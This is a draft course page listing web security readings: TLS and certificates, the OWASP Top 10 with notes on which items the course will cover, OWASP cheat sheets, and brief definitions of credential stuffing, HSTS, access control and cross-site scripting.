1 Security Topics: Readings and References
Under Construction, subject to change
- Networking, Protocols, Servers and Security
- TLS, HTTPS
- Sessions, security, certificates, cookies, tokens, tracking
2 HTTPS, TLS, and Certificates
Minimal Crypto basics: single key encryption, public key encryption, secure hashes, secure random numbers. No number theory…
TLS and HTTPS basics
Certificate tutorial: website certificates, other uses for certificates.
To be reviewed: Painless Self Signed Certificates in node.js
3 Web Application security
A good source of information is the Open Web Application Security Project (OWASP). However getting around their Wiki to find the “good stuff” can be a bit difficult. One place to go for very practical advice is their Cheet Sheet Series.
3.1 Top Threats
- A1: Injection Will cover
- A2: Broken Authentication Will cover
- A3: Sensitive Data Exposure
- A4: XML External Entities Not applicable to us
- A5: Broken Access Control
- A6: Security Misconfiguration will not cover
- A7: Cross-Site Scripting (XSS) Particularly relevant to us
- A8: Insecure Deserialization
- A9: Using Components with Known Vulnerabilities will not cover
- A10: Insufficient Logging & Monitoring will not cover
Authentication Cheat Sheet. The introduction defines authentication and relates to session management.
Credential stuffing is the automated injection of breached username/password pairs (typically from other sites) in order to identify accounts on the target system that use the same credentials.
3.4 Sensitive Data Exposure
Transport Layer Protection Cheat Sheet. All about correctly using TLS includes HTTPS.
This cheat sheet focuses on privacy and anonymity threats that users might face by using online services, especially in contexts such as social networking and communication platforms.
Password Storage Cheat Sheet. Important!
An architectural decision must be made to determine the appropriate method to protect data at rest.
This is a general computer security problem so should be covered in a computer security class.
HTTP Strict Transport Security (HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click through prompts on browsers.
3.5 Access Control
Authorization is the process where requests to access a particular resource should be granted or denied. It should be noted that authorization is not equivalent to authentication - as these terms and their definitions are frequently confused. Authentication is providing and validating identity. Authorization includes the execution rules that determines what functionality and data the user (or Principal) may access, ensuring the proper allocation of access rights after authentication is successful.
Browser protection mechanism: Cross-Origin Resource Sharing (CORS), this also comes up as a “hassle” during development.
3.6 Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
3.7 Also of Interest
4 Browser Security Features
Uses HTTP headers and such…